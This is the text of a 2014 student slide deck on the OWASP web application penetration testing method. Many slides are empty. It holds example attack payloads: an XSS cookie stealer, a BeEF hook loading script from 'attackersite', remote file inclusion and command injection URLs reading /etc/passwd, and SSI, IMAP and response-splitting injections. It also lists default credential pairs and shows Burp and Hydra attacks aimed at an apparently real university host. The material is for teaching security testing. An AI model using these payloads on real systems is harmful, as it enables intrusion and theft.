This is my college project presentation #April 2014.

2. o A penetration test is a method of evaluating
the security of a computer system or network by
simulating an attack.
o A Web Application Penetration Test focuses only on
evaluating the security of a web application.
o The process involves an active analysis of the
application for any weaknesses, technical flaws, or
vulnerabilities.
o Any security issues that are found will be presented
to the system owner together with an assessment of
their impact and often with a proposal for mitigation
or a technical solution.
2

3. o What is a vulnerability?
A vulnerability is a flaw or weakness in a system's
design, implementation, or operation and management that
could be exploited to violate the system's security policy.
• A threat is a potential attack that, by exploiting a
vulnerability, may harm the assets owned by an
application (resources of value, such as the data in a
database or in the file system).
• A test is an action that tends to show a vulnerability in the
application.
And Vulnerability is everywhere !!
3

4. 4

5. The OWASP Web Application Penetration
Testing method is based on the black box approach.
The tester knows nothing or very little information
about the application to be tested.
The testing model consists of:
o Tester: Who performs the testing activities
o Tools and methodology: The core of this Testing
Guide project
o Application: The black box to test
5

6. The test is divided into 2 phases:
1. Passive mode
2. Active mode
In the passive mode, the tester tries to
understand the application's logic, and plays with
the application. Tools can be used for information
gathering.
At the end of this phase, the tester should
understand all the access points (gates) of the
application
6

7. In this phase, the tester begins to test using the
methodology. We have split the set of active tests in 12
sub-categories for a total of 91 controls:
I. Information Gathering
II. Configuration and Deploy Management Testing
III. Identity Management Testing
IV. Authentication Testing
V. Authorization Testing
VI. Session Management Testing
VII. Data Validation Testing
VIII. Error Handling
IX. Cryptography
X. Logging
XI. Business Logic Testing
XII. Client Side Testing
7

8. 8

9. 1. Conduct Search Engine Discovery and Reconnaissance
for Information Leakage
2. Fingerprint Web Server
3. Review Webserver Metafiles for Information Leakage
4. Enumerate Applications on Webserver
5. Review Webpage Comments and Metadata for
Information Leakage
6. Identify application entry points
7. Map execution paths through application
8. Fingerprint Web Application Framework
9. Fingerprint Web Application
10. Map Network and Application Architecture
9

10. Google Hacking Database
10

11. Using a search engine, search for:
[1] Network diagrams and configurations
[2] Archived posts and emails by administrators and other key staff
[3] Logon procedures and username formats
[4] User names and passwords
[5] Error message content
[6] Development, test, UAT and staging versions of the website
Queries are put in several categories:
Footholds
Files containing usernames
Sensitive Directories
Web Server Detection
Vulnerable Files
Vulnerable Servers
Error Messages
Files containing juicy info
Files containing passwords
Sensitive Online Shopping Info
11

12. Web Application response
12

13. Knowing the version and type of a running web server
allows testers to determine known vulnerabilities and the
appropriate exploits to use during testing.
13

14. robots.txt file for Information Leakage of the web application's
directory/folder path(s).
14

15. Testing for web application vulnerabilities is to find out
which particular applications are hosted on a web server
15

16. Reverse-IP services
16

17. 17

18. Review webpage comments and metadata to better understand
the application and to find any information leakage.
18

19. Step 1) Navigate to http://app.utu.ac.in/ and Intercept that
same request using BURP Suite and send request into Intruder.
19

20. Step 2) Go to "Position" tab and select "GET" and click on "ADD" button
20

21. Step 3) Go to "Payloads" tab and select "HTTP Verbs" in to the Payload
Options category
21

22. Step 4) Select "Intruder" Menu and select "Start attack" option
22

23. Observe request and response
23

24. Response for OPTIONS method
24

25. 25

26. Request made process
26

27. 27

28. X-Power-by Contain Development
language name and version
28

29. Cookie default name contain its framework
Word press directory structure
More different framework cookie name refer : Page 75-76 (Documentation)
29

30. Currently one of the best fingerprinting tools on the market.
Included in a default Kali Linux build
30

31. This great tool works on the principle of static file
checksum based version difference thus providing a very
high quality of fingerprinting. Language: Python
31

32. Wapplyzer is a Firefox/Chrome plug-in
32

33. Web server fingerprinting is a critical task for the
Penetration tester. Knowing the version and type of a
running web server allows testers to determine known
vulnerabilities and the appropriate exploits to use during
testing.
Nmap version detection offers a lot of advanced features
that can help in determining services that are running on a given
host, it obtains all data by connecting to open ports and
interrogating them by using probes that the specific services
understand.
33

34. • List all the possible administrative interfaces.
• Determine if administrative interfaces are available from an
internal network or are also available from the Internet.
Firewall/IDS Identifier script
34

35. 1. Test Network/Infrastructure Configuration
2. Test Application Platform Configuration
3. Test File Extensions Handling for Sensitive Information
4. Backup and Unreferenced Files for Sensitive Information
5. Enumerate Infrastructure and Application Admin Interfaces
6. Test HTTP Methods
7. Test HTTP Strict Transport Security
8. Test RIA cross domain policy
35

36. Proper configuration management of the web server
infrastructure is very important in order to preserve the security of
the application itself. If elements such as the web server software,
the back-end database servers, or the authentication servers are
not properly reviewed and secured, they might introduce
undesired risks or introduce new vulnerabilities that might
compromise the application itself.
1. WebSEAL, also known as Tivoli Authentication Manager, is a reverse
proxy from IBM which is part of the Tivoli framework.
2. There are some GUI-based administration tools for Apache (like
NetLoony) but they are not in widespread use yet.
36

37. 1. Handle server errors (40x or 50x) with custom-made pages instead of
with the default web server pages.
2. Logging information
3. Keep in mind that all users can read .NET Framework machine.config and
root web.config files by default.
4. Only enable server modules (ISAPI extensions in the IIS case) that are
needed for the application.
37

38. Many web servers and application servers provide, in a default
installation, sample applications and files that are provided for the benefit
of the developer and in order to test that the server is working properly
right after installation.
However, many default web server applications have been later
known to be vulnerable. This was the case, for example, for CVE-1999-
0449 (Denial of Service in IIS when the Exair sample site had been
installed), CAN-2002-1744 (Directory traversal vulnerability in
CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in
Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source
sample in Apache’s Cocoon).
38

39. 39

40. When each file stem is tested, Burp check for various different extensions,
according to these settings.
40

41. While most of the files within a web server are directly
handled by the server itself, it isn't uncommon to find
unreferenced and/or forgotten files that can be used to obtain
important information about either the infrastructure or the
credentials.
Same as above test but only for backup information
41

42. THC-HYDRA for brute force attack
1)Set target port number or Protocol
2)Add Username and Password list
42

43. 3)Start Attack after some time we able to get root user password
43

44. Refer Identify application entry point
44

45. The use of this header by web applications avoids must be checked to
know if the following security issues could be produced:
• Attackers sniffing the network traffic and accessing the information
transferred through unencrypted channel.
• Attackers exploiting a man in the middle attack because of the
problem of accepting certificates that are not trusted.
• Users who mistakenly entered an address in the browser putting
HTTP instead of HTTPS, or users who click on a link in a web
application which mistakenly indicated the http protocol.
Strict-Transport-Security: max-age=60000; includeSubDomains
HSTS Header
45

46. Rich Internet Applications (RIA) have adopted Adobe's
crossdomain.xml policy files in order to allow for controlled cross
domain access to data and service consumption using technologies
such as Oracle Java, Silverlight, and Adobe Flash.
46

47. 1. Test Role Definitions
2. Test User Registration Process
3. Test Account Provisioning Process
4. Testing for Account Enumeration and Guessable User Account
5. Testing for Weak or unenforced username policy
47

48. ROLE PERMISSION OBJECT CONSTRAINTS
Administrator Read Customer
records
Manager Read Customer
records
Only records related to business
unit
Staff Read Customer
records
Only records associated with
customers assigned by Manager
Customer Read Customer
record
Only own record
48

49. 49

50. • Verify the identity requirements for
user registration align with
business/security requirements
• Validate the registration process
50

51. 51

52. Verify which accounts may provision other accounts and of what type
52

53. CN000100
CN000101
….
R1001 – user 001 for REALM1
R2001 – user 001 for REALM2
53

54. User account names are often highly
structured (e.g. Joe Bloggs account name is
jbloggs and Fred Nurks account name is
fnurks) and valid account names can easily be
guessed.
54

55. 1. Testing for Credentials Transported over an Encrypted Channel
2. Testing for default credentials
3. Testing for Weak lock out mechanism
4. Testing for bypassing authentication schema
5. Test remember password functionality
6. Testing for Browser cache weakness
7. Testing for Weak password policy
8. Testing for Weak security question/answer
9. Testing for weak password change or reset functionalities
10. Testing for Weaker authentication in alternative channel
55

56. SSLStrip
56

57. GET request send the credential
57

58. User Password
Tester Tester
Webmaster Webmaster
Admin Admin123
System System
Administrator admin
…… …….
58

59. Accounts are typically locked after 3 to 5 unsuccessful login
attempts and can only be unlocked after a predetermined
period of time, via a self-service unlock mechanism, or
intervention by an administrator.
59

60. There are several methods to bypass the authentication
schema in use by a web application:
 Direct page request (forced browsing)
 Parameter modification
 Session ID prediction
 SQL injection
60

61. 61

62. • Remember password functionality store your credential in
cookie
• You must check that credential is encrypted or not
62

63. Cache-Control: must-revalidate, pre-check=0, post-check=0,
max-age=0, s-maxage=0
--------------------------------
HTTP/1.1:
Cache-Control: no-cache
-------------------------------
HTTP/1.0:
Pragma: no-cache
Expires: <past date or illegal value (e.g., 0)>
63

64. The most prevalent and most easily administered authentication
mechanism is a static password. The password represents the
keys to the kingdom, but is often subverted by users in the name
of usability.
In each of the recent high profile hacks that have revealed user
credentials, it is lamented that most common passwords are still:
123456, password
64

65. Pre-generated questions:
• The majority of pre-generated questions are fairly simplistic in nature
and can lead to insecure answers. For example:
• The answers may be known to family members or close friends of the
user, e.g. "What is your mother's maiden name?", "What is your date of
birth?"
• The answers may be easily guessable, e.g. "What is your favorite color?",
"What is your favorite baseball team?"
• The answers may be brute forcible, e.g. "What is the first name of your
favorite high school teacher?" - the answer is probably on some easily
downloadable lists of popular first names, and therefore a simple brute
force attack can be scripted.
• The answers may be publicly discoverable, e.g. "What is your favorite
movie?" - the answer may easily be found on the user's social media
profile page.
65

66. In addition to the previous test it is important to verify:
Is the old password requested to complete the change?
The most insecure scenario here is if the application permits the
change of the password without requesting the current password.
Indeed if an attacker is able to take control of a valid session (s)he
could easily change the victim's password.
66

67. In addition to the previous test it is important to verify:
Is the old password requested to complete the change?
The most insecure scenario here is if the application permits the
change of the password without requesting the current password.
Indeed if an attacker is able to take control of a valid session (s)he
could easily change the victim's password.
67

68. 1. Testing Directory traversal/file include
2. Testing for bypassing authorization schema
3. Testing for Privilege Escalation
4. Testing for Insecure Direct Object References
68

69. 69

70.  Is it possible to access that resource even if the user is not authenticated?
 Is it possible to access that resource after the log-out?
 Is it possible to access functions and resources that should be accessible
to a user that holds a different role/privilege?
POST /admin/addUser.jsp HTTP/1.1
Host: www.example.com
[other HTTP headers]
userID=fakeuser&role=3&group=grp001
70

71. -----------------------------------------------------------
POST /user/viewOrder.jsp HTTP/1.1
Host: www.example.com
……
groupID=grp001&orderID=0001
-------------------------------------------------------------
Verify if a user that does not belong to grp001 can modify the value
of the parameters ‘groupID’ and ‘orderID’ to gain access to that
privileged data.
71

72. HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 1 Apr 2006 13:51:20 GMT
Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/;
domain=www.example.com
Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=
www.example.com
Cache-Control: no-cache
Pragma: No-cache
Content-length: 247
Content-Type: text/html
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
<form name="autoriz" method="POST" action = "visual.jsp">
<input type="hidden" name="profile" value="SysAdmin">
<body onload="document.forms.autoriz.submit()">
</td>
</tr>
72

73. Insecure Direct Object References allow attackers to bypass
authorization and access resources directly by modifying the
value of a parameter used to directly point to an object.
73

74. http://foo.bar/somepage?invoice=12345
http://foo.bar/showImage?img=img00011
http://foo.bar/changepassword?user=someuser
http://foo.bar/accessPage?menuitem=12
74

75. 1. Testing for Bypassing Session Management Schema
2. Testing for Cookies attributes
3. Testing for Session Fixation
4. Testing for Exposed Session Variables
5. Testing for Cross Site Request Forgery
6. Testing for logout functionality
7. Test Session Timeout
8. Testing for Session puzzling
75

76. If you have access to the session management schema
implementation, you can check for the following:
Random Session Token
Token length
Session Time-out
Cookie configuration:
o non-persistent: only RAM memory
o secure (set only on HTTPS channel): Set Cookie:
cookie=data; path=/; domain=.aaa.it; secure
o HTTPOnly (not readable by a script): Set Cookie:
cookie=data; path=/; domain=.aaa.it; HTTPOnly
76

77. 77

78. 78

79. Session ID before Login 79

80. Session ID After Login 80

81.  How are Session IDs transferred? e.g., GET, POST, Form Field (including
hidden fields)
 Are Session IDs always sent over encrypted transport by default?
 Is it possible to manipulate the application to send Session IDs
unencrypted? e.g., by changing HTTP to HTTPS?
 What cache-control directives are applied to requests/responses
passing Session IDs?
 Are these directives always present? If not, where are the exceptions?
 Are GET requests incorporating the Session ID used?
 If POST is used, can it be interchanged with GET?
81

82. Request submission without any CSRF request token.
A successful CSRF exploit can compromise end user data and
operation, when it targets a normal user.
If the targeted end user is the administrator account, a CSRF attack can
compromise the entire web application.
82

83. Testing for logout user interface:
Testing for server-side session termination
Testing for session timeout
Testing session clean at client side
In this phase, we check that the application automatically
logs out a user when that user has been idle for a certain amount
of time, ensuring that it is not possible to “reuse” the same session
and that no sensitive data remains stored in the browser cache.
83

84. This vulnerability occurs when an application uses the same session
variable for more than one purpose. An attacker can potentially access
pages in an order unanticipated by the developers so that the session
variable is set in one context and then used in another.
84

85. 1. Testing for Reflected Cross Site Scripting
2. Testing for Stored Cross Site Scripting
3. Testing for HTTP Verb Tampering
4. Testing for HTTP Parameter pollution
5. Testing for SQL Injection
5.1 Oracle Testing
5.2 MySQL Testing
5.3 SQL Server Testing
5.4 Testing PostgreSQL
5.5 MS Access Testing
5.6 Testing for NoSQL injection
………..
85

86. 6. Testing for LDAP Injection
7. Testing for ORM Injection
8. Testing for XML Injection
9. Testing for SSI Injection
10. Testing for XPath Injection
11. IMAP/SMTP Injection
12. Testing for Code Injection
12.1 Testing for Local File Inclusion
12.2 Testing for Remote File Inclusion
13. Testing for Command Injection
14. Testing for Buffer overflow
14.1 Testing for Heap overflow
14.2 Testing for Stack overflow
14.3 Testing for Format string
15. Testing for incubated vulnerabilities
16. Testing for HTTP Splitting/Smuggling
86

87. Reflected Cross-site Scripting (XSS) occur when an attacker injects
browser executable code within a single HTTP response.
http://example.com/index.php?user=<script>alert(123)</script>
Bypass XSS filters
Page#224
87

88. aaa@aa.com"><script>alert(document.cookie)</script>
88

89. BeEF hook
aaa@aa.com”><script src=http://attackersite/hook.js></script>
89

90. Step 1) Navigate to http://app.utu.ac.in/ and Intercept that
same request using BURP Suite and send request into Intruder.
90

91. Step 2) Go to "Position" tab and select "GET" and click on "ADD" button
91

92. Step 3) Go to "Payloads" tab and select "HTTP Verbs" in to the Payload
Options category
92

93. Step 4) Select "Intruder" Menu and select "Start attack" option
93

94. Observe request and response
94

95. Web Application Server
Backend
Parsing Result Example
ASP.NET / IIS concatenated with a
comma
color=red,blue
ASP / IIS concatenated with a
comma
color=red,blue
PHP / Apache Last occurrence only color=blue
PHP / Zeus Last occurrence only color=blue
JSP, Servlet / Apache
Tomcat
First occurrence only color=red
JSP, Servlet / Oracle
Application Server 10g
First occurrence only color=red
http://example.com/?color=red&color=blue
95

96. Authentication bypass
POST /add-authors.do HTTP/1.1
security_token=attackertoken&blogID=attackerblogidvalue&
blogID=victimblogidvalue&authorsList=tester@gmail.com(att
acker email)&ok=Invite
JSP, Servlet / Jetty First occurrence only color=red
IBM Lotus Domino Last occurrence only color=blue
IBM HTTP Server First occurrence only color=red
mod_perl, libapreq2 /
Apache
First occurrence only color=red
Perl CGI / Apache First occurrence only color=red
mod_wsgi (Python) /
Apache
First occurrence only color=red
Python / Zope All occurrences in List
data type
color=['red','blue']
96

97. 97

98. 98

99. 99

100. 100

101. 101

102. 102

103. LDAP injection testing is similar to SQL Injection testing. The differences
are that we use the LDAP protocol instead of SQL and that the target is
an LDAP Server instead of a SQL Server.
"(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))";
103

104. An ORM is an Object Relational Mapping tool. It is used to
expedite object oriented development within the data access layer of
software applications, including web applications.
for ORM Injection vulnerabilities is identical to SQL Injection
testing (see Testing for SQL Injection).
Orders.find_all "customer_id = 123 AND
order_date = '#{@params['order_date']}'"
Simply sending "' OR 1--" in the form where order date can be
entered can yield positive results.
104

105. 105

106. Web servers usually give developers the ability to add
small pieces of dynamic code inside static HTML pages, without
having to deal with full-fledged server-side or client-side
languages. This feature is incarnated by Server-Side Includes (SSI)
Injection.
106

107. .shtml file
Putting an SSI directive into a static HTML document is as easy as
writing a piece of code like the following:
--------------------------------------------------------
<!--#echo var="DATE_LOCAL" -->
--------------------------------------------------------
to print out the current time.
-----------------------------------------------------------------------
<!--#include virtual="/cgi-bin/counter.pl" -->
-----------------------------------------------------------------------
to include the output of a CGI script.
-----------------------------------------------------------------
<!--#include virtual="/footer.html" -->
-------------------------------------------------------------------
to include the content of a file or list files in a directory.
----------------------------------------------
<!--#exec cmd="ls" -->
----------------------------------------------
to include the output of a system command.
107

108. 108

109. FETCH 4791 BODY[HEADER]
----------------------------------------
In this scenario, the IMAP injection structure would be:
---------------------------------------------------------------------------------
http://<webmail>/read_email.php?message_id=4791
BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791
--------------------------------------------------------------------------------
Which would generate the following commands:
-------------------------------------------------
???? FETCH 4791 BODY[HEADER]
V100 CAPABILITY
V101 FETCH 4791 BODY[HEADER]
------------------------------------------------------
where:
----------------------------------------------------------
Header = 4791 BODY[HEADER]
Body = %0d%0aV100 CAPABILITY%0d%0a
Footer = V101 FETCH 4791
------------------------------------
Result Expected:
Arbitrary IMAP/SMTP command injection
109

110. http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/
cs.jpg?&cmd=uname%20-a
110

111. 111

112. Testing for Local File Inclusion
112

113. 113

114. Testing for Remote File Inclusion
http://youarehack.com 114

115. http://sensitive/cgi-bin/userData.pl?doc=user1.txt
http://sensitive/cgi-bin/userData.pl?doc=/bin/ls
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
115

116. 116

117. 117

118. advanced%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</htm
l>
--------------------------------------------------------------------------------
The resulting answer from the vulnerable application will therefore be
the following:
-----------------------------------------------------------
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35
<html>Sorry,%20System%20Down</html>
<other data> 118

119. 1. Analysis of Error Codes
2. Analysis of Stack Traces
119

120. 120

121. 121

122. 1. Testing for Weak SSL/TSL Ciphers, Insufficient Transport
Layer Protection
2. Testing for Padding Oracle
3. Testing for Sensitive information sent via unencrypted
channels
122

123. 123

124. 124

125. 125

126. 126

127. 1. Test time synchronisation
2. Test user-viewable log of authentication events
127

128. Date: Tue, 15 Oct 2013 14:11:09 GMT
Server: Apache
X-Frame-Options: Deny
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Language: en
Vary: Accept-Encoding,Cookie
Expires: Wed, 16 Oct 2013 14:11:09 GMT
Cache-Control: max-age=86400
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
200 OK
128

129. 129

130. 1. Testing for DOM based Cross Site Scripting
2. Testing for JavaScript Execution
3. Testing for HTML Injection
4. Testing for Client Side URL Redirect
5. Testing for CSS Injection
6. Testing for Client Side Resource Manipulation
7. Test Cross Origin Resource Sharing
8. Testing for Cross Site Flashing
9. Testing for Clickjacking
10. Testing WebSockets
11. Test Web Messaging
12. Test Local Storage
130

131. 131

132. 132

133. 133

134. http://www.victim.site/?#www.malicious.site
http://m.microsoft.com/library/linktrack.aspx?durl=xxxxxxxxxxxx
http://login.live.com/wlogin.srf?appid=00000000xxxxxxxx&alg=wsig
nin1.0&appctx=retUrl=xxxxx.xxxx/xxxx.xxx
134

135. www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;
(Opera [8,12])
www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)
Resource Type Tag/Method Sink
Frame iframe src
Link a href
AJAX Request xhr.open(method, [url], true); URL
CSS link href
Image img src
Object object data
Script script src
135

136. HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/xml
[Response Body]
136

137. 137

138. 138

139. 139

140. 140

141. iframe1.contentWindow.postMessage(“Hello world”,”http://www.example.com”);
141

142. The Open Web Application Security Project (OWASP)
is a 501(c)(3) worldwide not-for-profit charitable organization
focused on improving the security of software.
OWASP mission is to make software security visible, so that
individuals and organizations worldwide can make informed
decisions about true software security risks.
142

143. Net-Square Solutions Private Limited is a niche
Information Security Service provider. Net-Square completely
and mainly focused on technology based areas of
information security like application & infrastructure security.
Net-Square Solutions was founded by an
internationally experienced Information security specialist
Saumil Shah in the year 2000. Since then the Net-Square has
conducted many assignments for some of the best
Organizations in the World in sectors ranging from Banking
& Financial Services to Telecom to Retail to Pharmaceuticals.
143

144. 144